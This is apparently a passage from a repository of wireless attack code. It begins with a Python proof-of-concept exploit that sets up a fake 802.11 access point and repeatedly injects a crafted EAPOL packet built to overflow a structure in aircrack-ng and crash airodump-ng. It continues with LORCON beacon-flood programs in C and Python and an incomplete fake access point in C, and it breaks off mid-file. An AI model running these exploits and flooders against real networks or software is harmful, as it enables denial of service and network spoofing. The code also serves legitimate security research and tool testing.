| 41 | http://pyrit.wordpress.com/2010/03/31/aircrack-ng-still-vulnerable/ 42 | 43 | 44 | 03/31/2010, Lukas Lueg 45 | lukas.lueg@gmail.com 46 | http://pyrit.googlecode.com 47 | 48 | ''' 49 | 50 | from __future__ import with_statement 51 | 52 | import time 53 | import threading 54 | 55 | import cpyrit.pckttools 56 | import pylorcon 57 | import scapy.packet 58 | import scapy.fields 59 | from scapy.layers import dot11, l2 60 | 61 | 62 | class NetworkTransmitter(object): 63 | """A simple wrapper around pylorcon.Lorcon()""" 64 | def __init__(self, iface, driver='mac80211'): 65 | self.tx = pylorcon.Lorcon(iface, driver) 66 | self.tx.setfunctionalmode('INJECT') 67 | 68 | def setchannel(self, channel): 69 | self.tx.setchannel(channel) 70 | 71 | def write(self, buf): 72 | self.tx.txpacket(str(buf)) 73 | 74 | 75 | class AccessPoint(object): 76 | """A fake Access Point that makes itself known by sending beacons""" 77 | 78 | class AccessPointBeaconizer(threading.Thread): 79 | """Send beacons announcing the given ESSID, the channel and some fake 80 | rates and WPA2-information 81 | """ 82 | 83 | def __init__(self, ap): 84 | threading.Thread.__init__(self) 85 | self.ap = ap 86 | self.device = NetworkTransmitter(self.ap.iface) 87 | self.interval = 0.1 88 | self.beacon_pckt = dot11.Dot11(addr1='ff:ff:ff:ff:ff:ff', \ 89 | addr2=self.ap.bssid, \ 90 | addr3=self.ap.bssid) \ 91 | / dot11.Dot11Beacon(cap='ESS+privacy') \ 92 | / dot11.Dot11Elt(ID='SSID', \ 93 | info=self.ap.essid) \ 94 | / dot11.Dot11Elt(ID='DSset', \ 95 | info=chr(self.ap.channel)) \ 96 | / dot11.Dot11Elt(ID='Rates', \ 97 | info='\x82\x84\x0b\x16') \ 98 | / dot11.Dot11Elt(ID='RSNinfo', 99 | info='\x01\x00\x00\x0f\xac' \ 100 | '\x04\x01\x00\x00\x0f' \ 101 | '\xac\x04\x01\x00\x00' \ 102 | '\x0f\xac\x02\x00\x00') 103 | self.setDaemon(True) 104 | 105 | def run(self): 106 | while True: 107 | self.beacon_pckt.SC = self.ap.next_seq() 108 | now = time.time() - self.ap.starttime 109 | self.beacon_pckt[dot11.Dot11Beacon].timestamp = now * 1000000 110 | self.device.write(self.beacon_pckt) 111 | time.sleep(self.interval) 112 | 113 | 114 | def __init__(self, iface, bssid, essid, channel): 115 | self.channel = channel 116 | self.bssid = bssid 117 | self.essid = essid 118 | self.iface = iface 119 | self.seq = 0 120 | self.starttime = time.time() 121 | self.seq_lock = threading.Lock() 122 | self.beaconizer = self.AccessPointBeaconizer(self) 123 | self.beaconizer.start() 124 | 125 | def next_seq(self): 126 | with self.seq_lock: 127 | self.seq = (self.seq + 16) % 65535 128 | return self.seq 129 | 130 | 131 | class Aircracker(threading.Thread): 132 | """ A fake Wifi-network that includes one Access Point and one Station. 133 | The network passes around some data to attract the bees and then sends 134 | the exploit... 135 | """ 136 | def __init__(self, iface, bssid, essid, channel): 137 | threading.Thread.__init__(self) 138 | self.active = True 139 | self.device = NetworkTransmitter(iface) 140 | self.device.setchannel(channel) 141 | self.sta_mac = str(scapy.fields.RandMAC(template='00:*')) 142 | self.ap = AccessPoint(iface, bssid, essid, channel) 143 | 144 | """A dummy data-packet to generate traffic...""" 145 | self.data_pckt = dot11.Dot11(type="Data", addr1=self.sta_mac, \ 146 | addr2=bssid, addr3=bssid, \ 147 | FCfield='from-DS') \ 148 | / dot11.LLC() \ 149 | / dot11.SNAP() \ 150 | / dot11.EAPOL() \ 151 | / scapy.packet.Padding(load='a'*100) 152 | 153 | """A IEEE802.11-packet with LLC- and SNAP-header, looking like the 154 | second phase of a EAPOL-handshake (the confirmation). The packet 155 | will cause an overflow of the "eapol"-field in struct WPA_hdsk as 156 | defined in aircrack-ng.h and set eapol_size to a bogus value 157 | (crashing the PTK-calculation), type to 0 and state to 7 (completed 158 | handshake). 159 | The last 500 dummy-bytes will crash airodump-ng. Remove those to 160 | make airodump-ng go on and aircrack-ng show a completed handshake 161 | for our fake AP. Aircrack-ng will crash while computing the PTK... 162 | """ 163 | self.xp_pckt = dot11.Dot11(addr1='00:de:ad:c0:de:00', \ 164 | addr2=self.sta_mac, FCfield='to-DS') \ 165 | / dot11.LLC() \ 166 | / dot11.SNAP() \ 167 | / l2.EAPOL() \ 168 | / cpyrit.pckttools.EAPOL_Key() \ 169 | / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo='pairwise+mic')\ 170 | / scapy.packet.Padding(load=('a'*159) \ 171 | + '\xff\xff\xff\x0f' \ 172 | + '\x00\x00\x00\x00' \ 173 | + '\x07\x00\x00\x00' + 'a'*300) 174 | 175 | self.setDaemon(True) 176 | 177 | def run(self): 178 | i = 0 179 | while self.active: 180 | i += 1 181 | # Send a dummy data-packet 182 | self.data_pckt.SC = self.ap.next_seq() 183 | self.device.write(self.data_pckt) 184 | if i % 10 == 0: 185 | # Send the exploit 186 | self.device.write(self.xp_pckt) 187 | time.sleep(0.1) 188 | 189 | def close(self): 190 | self.active = False 191 | self.join() 192 | 193 | 194 | if __name__ == "__main__": 195 | print "Starting faked network..." 196 | aircrk = Aircracker('mon0', '00:de:ad:c0:de:00', 'Nobody', 13) 197 | aircrk.start() 198 | print "Serving..." 199 | try: 200 | while True: 201 | time.sleep(1) 202 | except KeyboardInterrupt: 203 | pass 204 | aircrk.close() 205 | print "Done" 206 | -------------------------------------------------------------------------------- /misc/lorcon_examples/README: -------------------------------------------------------------------------------- 1 | LORCON Examples and Patches 2 | by brad antoniewicz 3 | brad.antoniewicz@foundstone.com 4 | --------------------------------------------------- 5 | 6 | Various examples and patches for LORCON. These have 7 | all been tested on BT5R3. 8 | 9 | 10 | lorcon.patch - 11 | fixes a couple minor items in the lorcon install. 12 | 13 | Note: The lorcon2 instance on https://code.google.com/p/lorcon/ 14 | removes lcpa functionality.. idk wtf 15 | 16 | To use: 17 | 18 | root@bt:~# apt-get install libnl-dev 19 | root@bt:~# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2 20 | root@bt:~# cd lorcon2 21 | root@bt:~/lorcon2# patch -p1 < ../lorcon.patch 22 | root@bt:~/lorcon2# ./configure --prefix=/usr 23 | root@bt:~/lorcon2# make depend && make && make install 24 | 25 | beacon_flood_lcpa.c - 26 | Basic beacon flooder that uses LORCON's packet assembly 27 | functionality. 28 | 29 | To build: 30 | 31 | gcc -o beacon_flood_lcpa -lorcon2 beacon_flood_lcpa.c 32 | 33 | To run: 34 | 35 | ./beacon_flood_lcpa -i wlan1 -c 11 -s BRAD 36 | 37 | beacon_flood_raw.c - 38 | Basic beacon flooder that sends raw packet bytes. 39 | 40 | To build: 41 | 42 | gcc -o beacon_flood_raw -lorcon2 beacon_flood_raw.c 43 | 44 | To run: 45 | 46 | ./beacon_flood_raw -i wlan1 -c 11 47 | 48 | beacon_flood_raw.py - 49 | Basic beacon flooder that sends raw packet bytes using 50 | PyLorcon2. 51 | 52 | To build: 53 | root@bt:~# apt-get install libnl-dev 54 | root@bt:~# wget http://pylorcon2.googlecode.com/files/PyLorcon2-0.1.tar.gz 55 | root@bt:~# tar -zxvf PyLorcon2-0.1.tar.gz 56 | root@bt:~# cd PyLorcon2-0.1 57 | root@bt:~/PyLorcon2-0.1# python setup.py build 58 | root@bt:~/PyLorcon2-0.1# python setup.py install 59 | To run: 60 | python beacon_flood_raw.py -i wlan1 -c 11 61 | -------------------------------------------------------------------------------- /misc/lorcon_examples/basic_ap.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | THIS IS INCOMPLETE CODE! 4 | 5 | 6 | basic_ap.c 7 | by brad.antoniewicz@foundstone.com 8 | 9 | Simple access point using LORCON - Right 10 | now its just doing 802.11 session establishment 11 | 12 | THIS IS INCOMPLETE CODE! 13 | */ 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | 22 | #include // Needed for timestamp 23 | 24 | #include // For LORCON 25 | #include // For metapack packet assembly 26 | 27 | /* 28 | Various Constants 29 | */ 30 | #define MAC_LEN 6 31 | #define SRC_MAC_OFFSET 9 32 | #define DST_MAC_OFFSET 3 33 | #define BSSID_OFFSET 15 34 | 35 | #define SSID_LEN_OFFSET 37 36 | #define SSID_OFFSET 38 37 | 38 | #define PSSID_OFFSET 26 39 | #define PSRC_OFFSET 10 40 | 41 | 42 | #define TYPE_OFFSET 0 43 | 44 | 45 | /* 46 | This struct holds the AP information 47 | */ 48 | 49 | typedef struct { 50 | 51 | char *ssid; 52 | uint8_t ssid_len; 53 | 54 | uint8_t channel; 55 | 56 | uint8_t *src_mac; 57 | uint8_t *dst_mac; 58 | uint8_t *bssid; 59 | 60 | int beacon_interval; 61 | int capabilities; 62 | uint8_t *rates; 63 | 64 | struct timeval time; 65 | uint64_t timestamp; 66 | 67 | int got_probe_req; 68 | int got_assoc_req; 69 | int got_auth_req; 70 | 71 | } ap_info; 72 | 73 | ap_info ap_info_t; 74 | 75 | 76 | void usage(char *argv[]) { 77 | printf("\t-s \tSSID to flood\n"); 78 | printf("\t-i \tInterface\n"); 79 | printf("\t-c \tChannel\n"); 80 | //printf("\t-b \tBSSID (XX:XX:XX:XX:XX:XX)\n"); 81 | printf("\nExample:\n"); 82 | printf("\t%s -s brad -i wlan0 -c 1\n\n",argv[0]); 83 | } 84 | 85 | void *beacon(void *context) { 86 | 87 | lcpa_metapack_t *metapack; // metapack for LORCON packet assembly 88 | lorcon_packet_t *txpack; // The raw packet to be sent 89 | 90 | 91 | //Set up AP 92 | ap_info_t.beacon_interval = 100; 93 | ap_info_t.capabilities = 0x0421; 94 | ap_info_t.rates = "\x8c\x12\x98\x24\xb0\x48\x60\x6c"; // 6,9,12,18,24,36,48,54 95 | 96 | /* 97 | The following is the packet creation and sending code 98 | */ 99 | 100 | // Keep sending frames until interrupted 101 | while(1) { 102 | 103 | // Create timestamp 104 | gettimeofday(&ap_info_t.time, NULL); 105 | ap_info_t.timestamp = ap_info_t.time.tv_sec * 1000000 + ap_info_t.time.tv_usec; 106 | 107 | // Initialize the LORCON metapack 108 | metapack = lcpa_init(); 109 | 110 | // Create a Beacon frame from 00:DE:AD:BE:EF:00 111 | lcpf_beacon(metapack, ap_info_t.src_mac, ap_info_t.bssid, 0x00, 0x00, 0x00, 0x00, ap_info_t.timestamp, ap_info_t.beacon_interval, ap_info_t.capabilities); 112 | 113 | // Append IE Tag 0 for SSID 114 | lcpf_add_ie(metapack, 0, ap_info_t.ssid_len, ap_info_t.ssid); 115 | 116 | // Most of the following IE tags are not needed, but added here as examples 117 | 118 | // Append IE Tag 1 for rates 119 | lcpf_add_ie(metapack, 1, sizeof(ap_info_t.rates)-1, ap_info_t.rates); 120 | 121 | // Append IE Tag 3 for Channel 122 | lcpf_add_ie(metapack, 3, 1, &ap_info_t.channel); 123 | 124 | // Append IE Tags 42/47 for ERP Info 125 | lcpf_add_ie(metapack, 42, 1, "\x05"); 126 | lcpf_add_ie(metapack, 47, 1, "\x05"); 127 | 128 | // Convert the LORCON metapack to a LORCON packet for sending 129 | txpack = (lorcon_packet_t *) lorcon_packet_from_lcpa(context, metapack); 130 | 131 | // Send and exit if error 132 | if ( lorcon_inject(context,txpack) < 0 ) 133 | exit(1); 134 | 135 | // Wait interval before next beacon 136 | usleep(ap_info_t.beacon_interval * 1000); 137 | 138 | // Free the metapack 139 | lcpa_free(metapack); 140 | } 141 | 142 | 143 | } 144 | 145 | 146 | /* 147 | This function inspects packets, looking for a deauthentication frame 148 | */ 149 | 150 | int find_deauth(lorcon_packet_t *packet) { 151 | 152 | return 0; 153 | } 154 | 155 | /* 156 | This function sends a probe response 157 | */ 158 | void send_probe_resp(lorcon_t *context) { 159 | 160 | lcpa_metapack_t *metapack; // metapack for LORCON packet assembly 161 | lorcon_packet_t *txpack; // The raw packet to be sent 162 | 163 | 164 | /* 165 | The following is the packet creation and sending code 166 | */ 167 | 168 | // Initialize the LORCON metapack 169 | metapack = lcpa_init(); 170 | 171 | // Create 172 | lcpf_proberesp(metapack, ap_info_t.dst_mac, ap_info_t.src_mac, ap_info_t.bssid, 0x00, 0x00, 0x00, 0x00, ap_info_t.timestamp, ap_info_t.beacon_interval, ap_info_t.capabilities); 173 | 174 | // Append IE Tag 0 for SSID 175 | lcpf_add_ie(metapack, 0, ap_info_t.ssid_len, ap_info_t.ssid); 176 | 177 | // Send and exit if error 178 | if ( lorcon_inject(context,txpack) < 0 ) 179 | exit(1); 180 | 181 | // Free the metapack 182 | lcpa_free(metapack); 183 | 184 | } 185 | 186 | /* 187 | This function inspects packets, looking for a probe request 188 | */ 189 | 190 | int find_probe_req(lorcon_packet_t *packet) { 191 | 192 | int ret, i; 193 | char ssid[256]; 194 | char mac[MAC_LEN]; 195 | 196 | // Looking for any probe requests with a valid SSID length 197 | if ((packet->packet_header[0] == 0x40) && (packet->packet_header[PSSID_OFFSET-1] < 255) && (packet->packet_header[PSSID_OFFSET-1] != 0)) { 198 | 199 | for(i=0;ipacket_header[PSSID_OFFSET-1];i++) 200 | ssid[i] = packet->packet_header[PSSID_OFFSET + i]; 201 | ssid[packet->packet_header[PSSID_OFFSET-1]] = '\0'; 202 | 203 | ret = strncmp(ssid,ap_info_t.ssid, packet->packet_header[PSSID_OFFSET-1]); 204 | 205 | if ( ret == 0 ) { 206 | // TODO: Set MAC in ap_info_t 207 | ap_info_t.got_probe_req = 1; 208 | return 1; // Found probe request for my SSID 209 | } 210 | 211 | } 212 | 213 | return 0; // Didn't find a probe request for my SSID 214 | 215 | 216 | } 217 | 218 | /* 219 | This function waits for a probe request then responds 220 | with a probe response 221 | */ 222 | void probe_state(lorcon_t *context, lorcon_packet_t *packet, u_char *user) { 223 | 224 | if (find_probe_req(packet) && ap_info_t.got_probe_req == 1) { 225 | printf("[+] Got probe request\n"); 226 | 227 | } 228 | 229 | if (find_deauth(packet) && ap_info_t.got_probe_req == 1) { 230 | printf("[!] Got deauthentication frame!\n"); 231 | ap_info_t.got_probe_req = 0; 232 | lorcon_breakloop(context); 233 | } 234 | 235 | } 236 | 237 | /* 238 | This function sends a association response 239 | */ 240 | void send_assoc_resp(lorcon_t *context) { 241 | 242 | 243 | } 244 | 245 | /* 246 | This function waits for a association request then responds 247 | with a association response 248 | */ 249 | void assoc_state(lorcon_t *context, lorcon_packet_t *packet, u_char *user) { 250 | 251 | if ( !ap_info_t.got_probe_req ) { 252 | lorcon_loop(context, 0, probe_state, NULL); 253 | } 254 | 255 | 256 | } 257 | 258 | 259 | /* 260 | This function sends a authentication response 261 | */ 262 | void send_auth_resp(lorcon_t *context) { 263 | 264 | 265 | } 266 | 267 | 268 | /* 269 | This function waits for a authentication request then responds 270 | with a association response 271 | */ 272 | void auth_state(lorcon_t *context, lorcon_packet_t *packet, u_char *user) { 273 | 274 | if ( !ap_info_t.got_probe_req ) { 275 | lorcon_loop(context, 0, probe_state, NULL); 276 | } 277 | 278 | if ( !ap_info_t.got_assoc_req ) { 279 | lorcon_loop(context, 0, assoc_state, NULL); 280 | } 281 | 282 | 283 | } 284 | 285 | 286 | int main(int argc, char *argv[]) { 287 | 288 | char *interface = NULL; 289 | int c, ret; 290 | 291 | pthread_t beacon_thread; 292 | 293 | lorcon_driver_t *drvlist, *driver; // Needed to set up interface/context 294 | lorcon_t *context; // LORCON context 295 | 296 | // BSSID and source MAC address 297 | ap_info_t.src_mac = "\x00\xDE\xAD\xBE\xEF\x00"; 298 | ap_info_t.bssid = "\x00\xDE\xAD\xBE\xEF\x00"; 299 | 300 | ap_info_t.ssid = NULL; 301 | ap_info_t.got_probe_req = 0; 302 | ap_info_t.got_assoc_req = 0; 303 | ap_info_t.got_auth_req = 0; 304 | 305 | printf ("%s - Simple 802.11 Access Point\n", argv[0]); 306 | printf ("-----------------------------------------------------\n\n"); 307 | 308 | /* 309 | This handles all of the command line arguments 310 | */ 311 | 312 | while ((c = getopt(argc, argv, "i:s:hc:b:")) != EOF) { 313 | switch (c) { 314 | case 'i': 315 | interface = strdup(optarg); 316 | break; 317 | case 's': 318 | if ( strlen(strdup(optarg)) < 255 ) { 319 | ap_info_t.ssid = strdup(optarg); 320 | ap_info_t.ssid_len = strlen(ap_info_t.ssid); 321 | } else { 322 | printf("ERROR: SSID Length too long! Should not exceed 255 characters\n"); 323 | return -1; 324 | } 325 | break; 326 | case 'c': 327 | ap_info_t.channel = atoi(optarg); 328 | break; 329 | case 'h': 330 | usage(argv); 331 | break; 332 | default: 333 | usage(argv); 334 | break; 335 | } 336 | } 337 | 338 | if ( interface == NULL || ap_info_t.ssid == NULL ) { 339 | printf ("ERROR: Interface, channel, or SSID not set (see -h for more info)\n"); 340 | return -1; 341 | } 342 | 343 | printf("[+] Using interface %s\n",interface); 344 | 345 | /* 346 | The following is all of the standard interface, driver, and context setup 347 | */ 348 | 349 | // Automatically determine the driver of the interface 350 | 351 | if ( (driver = lorcon_auto_driver(interface)) == NULL) { 352 | printf("[!] Could not determine the driver for %s\n",interface); 353 | return -1; 354 | } else { 355 | printf("[+]\t Driver: %s\n",driver->name); 356 | } 357 | 358 | // Create LORCON context 359 | if ((context = lorcon_create(interface, driver)) == NULL) { 360 | printf("[!]\t Failed to create context"); 361 | return -1; 362 | } 363 | 364 | // Create Monitor Mode Interface 365 | if (lorcon_open_injmon(context) < 0) { 366 | printf("[!]\t Could not create Monitor Mode interface!\n"); 367 | return -1; 368 | } else { 369 | printf("[+]\t Monitor Mode VAP: %s\n",lorcon_get_vap(context)); 370 | lorcon_free_driver_list(driver); 371 | } 372 | 373 | // Set the channel we'll be injecting on 374 | lorcon_set_channel(context, ap_info_t.channel); 375 | printf("[+]\t Using channel: %d\n\n",ap_info_t.channel); 376 | 377 | /* 378 | Bulk of program 379 | */ 380 | 381 | // Start thread for beacons 382 | printf("[+] Spawning Beacon Thread for SSID: %s ....",ap_info_t.ssid); 383 | 384 | ret = pthread_create( &beacon_thread, NULL, beacon, (void*) context ); 385 | 386 | if ( ret == 0 ) { 387 | printf("STARTED\n"); 388 | } else { 389 | printf("FAILED (%d) \n", ret); 390 | exit(1); 391 | } 392 | 393 | //sleep(1000); 394 | 395 | printf("[+] Waiting for a probe request\n"); 396 | lorcon_loop(context, 0, probe_state, NULL); 397 | 398 | /* 399 | The following is all of the standard cleanup stuff 400 | */ 401 | 402 | // Close the interface 403 | lorcon_close(context); 404 | 405 | // Free the LORCON Context 406 | lorcon_free(context); 407 | 408 | return 0; 409 | 410 | } 411 | 412 | -------------------------------------------------------------------------------- /misc/lorcon_examples/beacon_flood_lcpa.c: -------------------------------------------------------------------------------- 1 | /* 2 | beacon_flood_lcpa.c 3 | by brad.antoniewicz@foundstone.com 4 | 5 | simple IEEE 802.11 beacon flooder using LORCON2's 6 | packet assembly functionality 7 | 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | #include // Needed for timestamp 15 | 16 | #include // For LORCON 17 | #include // For metapack packet assembly 18 | 19 | void usage(char *argv[]) { 20 | printf("\t-s \tSSID to flood\n"); 21 | printf("\t-i \tInterface\n"); 22 | printf("\t-c \tChannel\n"); 23 | printf("\nExample:\n"); 24 | printf("\t%s -s brad -i wlan0 -c 1\n\n",argv[0]); 25 | } 26 | int main(int argc, char *argv[]) { 27 | 28 | char *interface = NULL, *ssid = NULL; 29 | int c; 30 | uint8_t channel; 31 | unsigned int count=0; 32 | 33 | lorcon_driver_t *drvlist, *driver; // Needed to set up interface/context 34 | lorcon_t *context; // LORCON context 35 | 36 | lcpa_metapack_t *metapack; // metapack for LORCON packet assembly 37 | lorcon_packet_t *txpack; // The raw packet to be sent 38 | 39 | /* 40 | These are needed for the actual beacon frame 41 | */ 42 | 43 | // BSSID and source MAC address 44 | uint8_t *mac = "\x00\xDE\xAD\xBE\xEF\x00"; 45 | 46 | // Timestamp 47 | struct timeval time; 48 | uint64_t timestamp; 49 | 50 | // Supported Rates 51 | uint8_t rates[] = "\x8c\x12\x98\x24\xb0\x48\x60\x6c"; // 6,9,12,18,24,36,48,54 52 | 53 | // Beacon Interval 54 | int interval = 100; 55 | 56 | // Capabilities 57 | int capabilities = 0x0421; 58 | 59 | 60 | printf ("%s - Simple 802.11 Beacon Flooder\n", argv[0]); 61 | printf ("-----------------------------------------------------\n\n"); 62 | 63 | /* 64 | This handles all of the command line arguments 65 | */ 66 | 67 | while ((c = getopt(argc, argv, "i:s:hc:")) != EOF) { 68 | switch (c) { 69 | case 'i': 70 | interface = strdup(optarg); 71 | break; 72 | case 's': 73 | if ( strlen(strdup(optarg)) < 255 ) { 74 | ssid = strdup(optarg); 75 | } else { 76 | printf("ERROR: SSID Length too long! Should not exceed 255 characters\n"); 77 | return -1; 78 | } 79 | break; 80 | case 'c': 81 | channel = atoi(optarg); 82 | break; 83 | case 'h': 84 | usage(argv); 85 | break; 86 | default: 87 | usage(argv); 88 | break; 89 | } 90 | } 91 | 92 | if ( interface == NULL || ssid == NULL ) { 93 | printf ("ERROR: Interface, channel, or SSID not set (see -h for more info)\n"); 94 | return -1; 95 | } 96 | 97 | printf("[+] Using interface %s\n",interface); 98 | 99 | /* 100 | The following is all of the standard interface, driver, and context setup 101 | */ 102 | 103 | // Automatically determine the driver of the interface 104 | 105 | if ( (driver = lorcon_auto_driver(interface)) == NULL) { 106 | printf("[!] Could not determine the driver for %s\n",interface); 107 | return -1; 108 | } else { 109 | printf("[+]\t Driver: %s\n",driver->name); 110 | } 111 | 112 | // Create LORCON context 113 | if ((context = lorcon_create(interface, driver)) == NULL) { 114 | printf("[!]\t Failed to create context"); 115 | return -1; 116 | } 117 | 118 | // Create Monitor Mode Interface 119 | if (lorcon_open_injmon(context) < 0) { 120 | printf("[!]\t Could not create Monitor Mode interface!\n"); 121 | return -1; 122 | } else { 123 | printf("[+]\t Monitor Mode VAP: %s\n",lorcon_get_vap(context)); 124 | lorcon_free_driver_list(driver); 125 | } 126 | 127 | // Set the channel we'll be injecting on 128 | lorcon_set_channel(context, channel); 129 | printf("[+]\t Using channel: %d\n\n",channel); 130 | 131 | /* 132 | The following is the packet creation and sending code 133 | */ 134 | 135 | // Keep sending frames until interrupted 136 | while(1) { 137 | 138 | // Create timestamp 139 | gettimeofday(&time, NULL); 140 | timestamp = time.tv_sec * 1000000 + time.tv_usec; 141 | 142 | // Initialize the LORCON metapack 143 | metapack = lcpa_init(); 144 | 145 | // Create a Beacon frame from 00:DE:AD:BE:EF:00 146 | lcpf_beacon(metapack, mac, mac, 0x00, 0x00, 0x00, 0x00, timestamp, interval, capabilities); 147 | 148 | // Append IE Tag 0 for SSID 149 | lcpf_add_ie(metapack, 0, strlen(ssid),ssid); 150 | 151 | // Most of the following IE tags are not needed, but added here as examples 152 | 153 | // Append IE Tag 1 for rates 154 | lcpf_add_ie(metapack, 1, sizeof(rates)-1, rates); 155 | 156 | // Append IE Tag 3 for Channel 157 | lcpf_add_ie(metapack, 3, 1, &channel); 158 | 159 | // Append IE Tags 42/47 for ERP Info 160 | lcpf_add_ie(metapack, 42, 1, "\x05"); 161 | lcpf_add_ie(metapack, 47, 1, "\x05"); 162 | 163 | // Convert the LORCON metapack to a LORCON packet for sending 164 | txpack = (lorcon_packet_t *) lorcon_packet_from_lcpa(context, metapack); 165 | 166 | // Send and exit if error 167 | if ( lorcon_inject(context,txpack) < 0 ) 168 | return -1; 169 | 170 | // Wait interval before next beacon 171 | usleep(interval * 1000); 172 | 173 | // Print nice and pretty 174 | printf("\033[K\r"); 175 | printf("[+] Sent %d frames, Hit CTRL + C to stop...", count); 176 | fflush(stdout); 177 | count++; 178 | 179 | // Free the metapack 180 | lcpa_free(metapack); 181 | } 182 | 183 | /* 184 | The following is all of the standard cleanup stuff 185 | */ 186 | 187 | // Close the interface 188 | lorcon_close(context); 189 | 190 | // Free the LORCON Context 191 | lorcon_free(context); 192 | 193 | return 0; 194 | } 195 | 196 | -------------------------------------------------------------------------------- /misc/lorcon_examples/beacon_flood_raw.c: -------------------------------------------------------------------------------- 1 | /* 2 | beacon_flood_raw.c 3 | by brad.antoniewicz@foundstone.com 4 | 5 | simple IEEE 802.11 beacon flooder using LORCON2's 6 | raw sending capabilities 7 | 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | #include // For LORCON 14 | 15 | void usage(char *argv[]) { 16 | printf("\t-i \tInterface\n"); 17 | printf("\t-c \tChannel\n"); 18 | printf("\nExample:\n"); 19 | printf("\t%s -i wlan0 -c 1\n\n",argv[0]); 20 | } 21 | int main(int argc, char *argv[]) { 22 | 23 | char *interface = NULL, *ssid = NULL; 24 | int c, channel; 25 | unsigned int count=0; 26 | 27 | lorcon_driver_t *drvlist, *driver; // Needed to set up interface/context 28 | lorcon_t *context; // LORCON context 29 | 30 | // Beacon Interval 31 | int interval = 100; 32 | 33 | // Raw packet bytes (from capture_example.c included within LORCON) 34 | unsigned char packet[115] = { 35 | 0x80, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // dur ffff 36 | 0xff, 0xff, 0x00, 0x0f, 0x66, 0xe3, 0xe4, 0x03, 37 | 0x00, 0x0f, 0x66, 0xe3, 0xe4, 0x03, 0x00, 0x00, // 0x0000 - seq no. 38 | 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // BSS timestamp 39 | 0x64, 0x00, 0x11, 0x00, 0x00, 0x0f, 0x73, 0x6f, 40 | 0x6d, 0x65, 0x74, 0x68, 0x69, 0x6e, 0x67, 0x63, 41 | 0x6c, 0x65, 0x76, 0x65, 0x72, 0x01, 0x08, 0x82, 42 | 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c, 0x03, 43 | 0x01, 0x01, 0x05, 0x04, 0x00, 0x01, 0x00, 0x00, 44 | 0x2a, 0x01, 0x05, 0x2f, 0x01, 0x05, 0x32, 0x04, 45 | 0x0c, 0x12, 0x18, 0x60, 0xdd, 0x05, 0x00, 0x10, 46 | 0x18, 0x01, 0x01, 0xdd, 0x16, 0x00, 0x50, 0xf2, 47 | 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 48 | 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 49 | 0x50, 0xf2, 0x02}; 50 | 51 | 52 | 53 | printf ("%s - Simple 802.11 beacon flooder\n", argv[0]); 54 | printf ("-----------------------------------------------------\n\n"); 55 | 56 | /* 57 | This handles all of the command line arguments 58 | */ 59 | 60 | while ((c = getopt(argc, argv, "i:s:hc:")) != EOF) { 61 | switch (c) { 62 | case 'i': 63 | interface = strdup(optarg); 64 | break; 65 | case 'c': 66 | channel = atoi(optarg); 67 | break; 68 | case 'h': 69 | usage(argv); 70 | break; 71 | default: 72 | usage(argv); 73 | break; 74 | } 75 | } 76 | 77 | if ( interface == NULL ) { 78 | printf ("ERROR: Interface not set (see -h for more info)\n"); 79 | return -1; 80 | } 81 | 82 | printf("[+] Using interface %s\n",interface); 83 | 84 | /* 85 | The following is all of the standard interface, driver, and context setup 86 | */ 87 | 88 | // Automatically determine the driver of the interface 89 | 90 | if ( (driver = lorcon_auto_driver(interface)) == NULL) { 91 | printf("[!] Could not determine the driver for %s\n",interface); 92 | return -1; 93 | } else { 94 | printf("[+]\t Driver: %s\n",driver->name); 95 | } 96 | 97 | // Create LORCON context 98 | if ((context = lorcon_create(interface, driver)) == NULL) { 99 | printf("[!]\t Failed to create context"); 100 | return -1; 101 | } 102 | 103 | // Create Monitor Mode Interface 104 | if (lorcon_open_injmon(context) < 0) { 105 | printf("[!]\t Could not create Monitor Mode interface!\n"); 106 | return -1; 107 | } else { 108 | printf("[+]\t Monitor Mode VAP: %s\n",lorcon_get_vap(context)); 109 | lorcon_free_driver_list(driver); 110 | } 111 | 112 | // Set the channel we'll be injecting on 113 | lorcon_set_channel(context, channel); 114 | printf("[+]\t Using channel: %d\n\n",channel); 115 | 116 | /* 117 | The following is the packet creation and sending code 118 | */ 119 | 120 | // Keep sending frames until interrupted 121 | while(1) { 122 | 123 | // Send and exit if error 124 | if ( lorcon_send_bytes(context, sizeof(packet), packet) < 0 ) 125 | return -1; 126 | 127 | // Wait interval before next beacon 128 | usleep(interval * 1000); 129 | 130 | // Print nice and pretty 131 | printf("\033[K\r"); 132 | printf("[+] Sent %d frames, Hit CTRL + C to stop...", count); 133 | fflush(stdout); 134 | count++; 135 | 136 | } 137 | 138 | /* 139 | The following is all of the standard cleanup stuff 140 | */ 141 | 142 | // Close the interface 143 | lorcon_close(context); 144 | 145 | // Free the LORCON Context 146 | lorcon_free(context); 147 | 148 | return 0; 149 | } 150 | 151 | -------------------------------------------------------------------------------- /misc/lorcon_examples/beacon_flood_raw.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # beacon_flood_raw.py - Simple IEEE 802.11 4 | # beacon flooder using pylorcon2's raw 5 | # sending capabilities. 6 | # 7 | # brad.antoniewicz@foundstone.com 8 | # 9 | # 10 | 11 | import getopt 12 | import sys 13 | import string 14 | 15 | from time import sleep 16 | 17 | import PyLorcon2 18 | 19 | def usage(): 20 | print "\t-i \tInterface" 21 | print "\t-c \tChannel" 22 | print "\nExample: " 23 | print "\t",sys.argv[0],"-i wlan0 -c 11\n" 24 | 25 | 26 | ''' 27 | main 28 | ''' 29 | 30 | print sys.argv[0]," - Simple 802.11 beacon flooder" 31 | print "-----------------------------------------------------\n" 32 | 33 | # Beacon interval 34 | interval = 100 35 | 36 | # Raw packet bytes (from capture_example.c included within LORCON) 37 | packet = "\x80\x00\xff\xff\xff\xff\xff\xff" \ 38 | "\xff\xff\x00\x0f\x66\xe3\xe4\x03" \ 39 | "\x00\x0f\x66\xe3\xe4\x03\x00\x00" \ 40 | "\xff\xff\xff\xff\xff\xff\xff\xff" \ 41 | "\x64\x00\x11\x00\x00\x0f\x73\x6f" \ 